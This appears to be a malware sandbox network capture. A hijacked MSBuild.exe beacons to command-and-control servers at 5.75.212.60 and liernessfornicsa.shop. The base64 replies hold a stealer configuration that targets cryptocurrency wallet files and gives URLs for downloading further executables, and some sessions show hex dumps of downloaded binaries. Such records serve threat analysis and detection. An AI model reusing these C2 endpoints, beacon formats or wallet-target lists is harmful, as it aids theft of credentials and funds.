f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b Data Ascii: Q=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`\|$\tD$euL$PhD$TD$E
2024-07-26 16:56:31 UTC	16384	IN	Data Raw: 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d Data Ascii: @;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
2024-07-26 16:56:31 UTC	16384	IN	Data Raw: 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
2024-07-26 16:56:31 UTC	16384	IN	Data Raw: d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 Data Ascii: %D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
2024-07-26 16:56:31 UTC	16384	IN	Data Raw: 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 Data Ascii: 8C0;^h\|D$Fh\|$urVd@\|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$\|$D$pdD$H<@D>D$1V>D$>D$>D$\$
2024-07-26 16:56:31 UTC	16384	IN	Data Raw: 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
2024-07-26 16:56:31 UTC	16384	IN	Data Raw: e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 Data Ascii: `P19F$WtL$ u\|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rtt
2024-07-26 16:56:31 UTC	16384	IN	Data Raw: 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 Data Ascii: 4D$$D$@@L$;A<\|$7h't$D$$hH\|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49754	5.75.212.60	443	7280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:33 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJKEBGHJKFIDGCAAFCAF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 1145 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:56:33 UTC	1145	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 36 34 31 64 35 33 64 63 65 63 31 61 62 66 30 63 66 36 62 64 32 66 36 62 63 36 31 37 34 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 30 38 33 37 62 31 64 34 35 61 61 37 66 30 65 63 66 32 64 66 35 35 32 61 37 63 61 38 33 32 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 46 0d 0a 43 6f 6e 74 Data Ascii: ------JJKEBGHJKFIDGCAAFCAFContent-Disposition: form-data; name="token"5a641d53dcec1abf0cf6bd2f6bc6174d------JJKEBGHJKFIDGCAAFCAFContent-Disposition: form-data; name="build_id"b0837b1d45aa7f0ecf2df552a7ca832a------JJKEBGHJKFIDGCAAFCAFCont
2024-07-26 16:56:35 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:56:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 16:56:35 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49755	5.75.212.60	443	7280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:35 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIDAKFIJJKJJJKEBKJEH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:56:35 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 36 34 31 64 35 33 64 63 65 63 31 61 62 66 30 63 66 36 62 64 32 66 36 62 63 36 31 37 34 64 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 30 38 33 37 62 31 64 34 35 61 61 37 66 30 65 63 66 32 64 66 35 35 32 61 37 63 61 38 33 32 61 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 Data Ascii: ------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="token"5a641d53dcec1abf0cf6bd2f6bc6174d------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="build_id"b0837b1d45aa7f0ecf2df552a7ca832a------HIDAKFIJJKJJJKEBKJEHCont
2024-07-26 16:56:36 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:56:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 16:56:36 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49756	5.75.212.60	443	7280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:37 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECFCBFBGDBKJKECAAKKF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:56:37 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 36 34 31 64 35 33 64 63 65 63 31 61 62 66 30 63 66 36 62 64 32 66 36 62 63 36 31 37 34 64 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 30 38 33 37 62 31 64 34 35 61 61 37 66 30 65 63 66 32 64 66 35 35 32 61 37 63 61 38 33 32 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 0d 0a 43 6f 6e 74 Data Ascii: ------ECFCBFBGDBKJKECAAKKFContent-Disposition: form-data; name="token"5a641d53dcec1abf0cf6bd2f6bc6174d------ECFCBFBGDBKJKECAAKKFContent-Disposition: form-data; name="build_id"b0837b1d45aa7f0ecf2df552a7ca832a------ECFCBFBGDBKJKECAAKKFCont
2024-07-26 16:56:38 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:56:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 16:56:38 UTC	155	IN	Data Raw: 39 30 0d 0a 4e 6a 6b 78 4d 44 63 33 66 47 68 30 64 48 41 36 4c 79 38 78 4e 44 63 75 4e 44 55 75 4e 44 51 75 4d 54 41 30 4c 33 4e 30 5a 57 46 73 63 79 39 71 5a 57 34 78 61 47 63 75 5a 58 68 6c 66 44 46 38 61 32 74 72 61 33 77 32 4f 54 45 77 4e 7a 68 38 61 48 52 30 63 44 6f 76 4c 7a 45 30 4e 79 34 30 4e 53 34 30 4e 43 34 78 4d 44 51 76 63 33 52 6c 59 57 78 7a 4c 32 64 6d 62 6a 46 6e 62 79 35 6c 65 47 56 38 4d 58 78 72 61 32 74 72 66 41 3d 3d 0d 0a 30 0d 0a 0d 0a Data Ascii: 90NjkxMDc3fGh0dHA6Ly8xNDcuNDUuNDQuMTA0L3N0ZWFscy9qZW4xaGcuZXhlfDF8a2tra3w2OTEwNzh8aHR0cDovLzE0Ny40NS40NC4xMDQvc3RlYWxzL2dmbjFnby5leGV8MXxra2trfA==0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49758	5.75.212.60	443	7280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:44 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIDGCFBFBFBKEBGCAFCG User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 498 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:56:44 UTC	498	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 36 34 31 64 35 33 64 63 65 63 31 61 62 66 30 63 66 36 62 64 32 66 36 62 63 36 31 37 34 64 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 30 38 33 37 62 31 64 34 35 61 61 37 66 30 65 63 66 32 64 66 35 35 32 61 37 63 61 38 33 32 61 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 0d 0a 43 6f 6e 74 Data Ascii: ------HIDGCFBFBFBKEBGCAFCGContent-Disposition: form-data; name="token"5a641d53dcec1abf0cf6bd2f6bc6174d------HIDGCFBFBFBKEBGCAFCGContent-Disposition: form-data; name="build_id"b0837b1d45aa7f0ecf2df552a7ca832a------HIDGCFBFBFBKEBGCAFCGCont
2024-07-26 16:56:46 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:56:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 16:56:46 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49759	5.75.212.60	443	7280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:52 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 498 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:56:52 UTC	498	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 36 34 31 64 35 33 64 63 65 63 31 61 62 66 30 63 66 36 62 64 32 66 36 62 63 36 31 37 34 64 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 30 38 33 37 62 31 64 34 35 61 61 37 66 30 65 63 66 32 64 66 35 35 32 61 37 63 61 38 33 32 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 Data Ascii: ------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="token"5a641d53dcec1abf0cf6bd2f6bc6174d------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="build_id"b0837b1d45aa7f0ecf2df552a7ca832a------EGDGIIJJECFIDHJJKKFCCont
2024-07-26 16:56:52 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:56:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 16:56:52 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49760	172.67.213.85	443	7916	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:52 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: liernessfornicsa.shop
2024-07-26 16:56:52 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-07-26 16:56:53 UTC	810	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 16:56:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=kgjq5gmedf7uephpp0m47ej50q; expires=Tue, 19-Nov-2024 10:43:31 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=URCN%2FF%2BnL2s%2FqrdqzXkDeYKi7IKKowQcdXIoERqP2pNlnUJgk6%2FGrp3EPxQ9SmAXksX3yIshiMEsJ0rjRvqWq%2F2Kuz1mrTqQRH8wYw9HbmvXUUw6xoMWLULHerXku9Bf2MyNmvORhks%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a95ecf1198141fe-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 16:56:53 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-07-26 16:56:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49761	5.75.212.60	443	7280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:53 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCGCBFHCFCFBFIEBGHJE User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:56:53 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 36 34 31 64 35 33 64 63 65 63 31 61 62 66 30 63 66 36 62 64 32 66 36 62 63 36 31 37 34 64 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 30 38 33 37 62 31 64 34 35 61 61 37 66 30 65 63 66 32 64 66 35 35 32 61 37 63 61 38 33 32 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 0d 0a 43 6f 6e 74 Data Ascii: ------HCGCBFHCFCFBFIEBGHJEContent-Disposition: form-data; name="token"5a641d53dcec1abf0cf6bd2f6bc6174d------HCGCBFHCFCFBFIEBGHJEContent-Disposition: form-data; name="build_id"b0837b1d45aa7f0ecf2df552a7ca832a------HCGCBFHCFCFBFIEBGHJECont
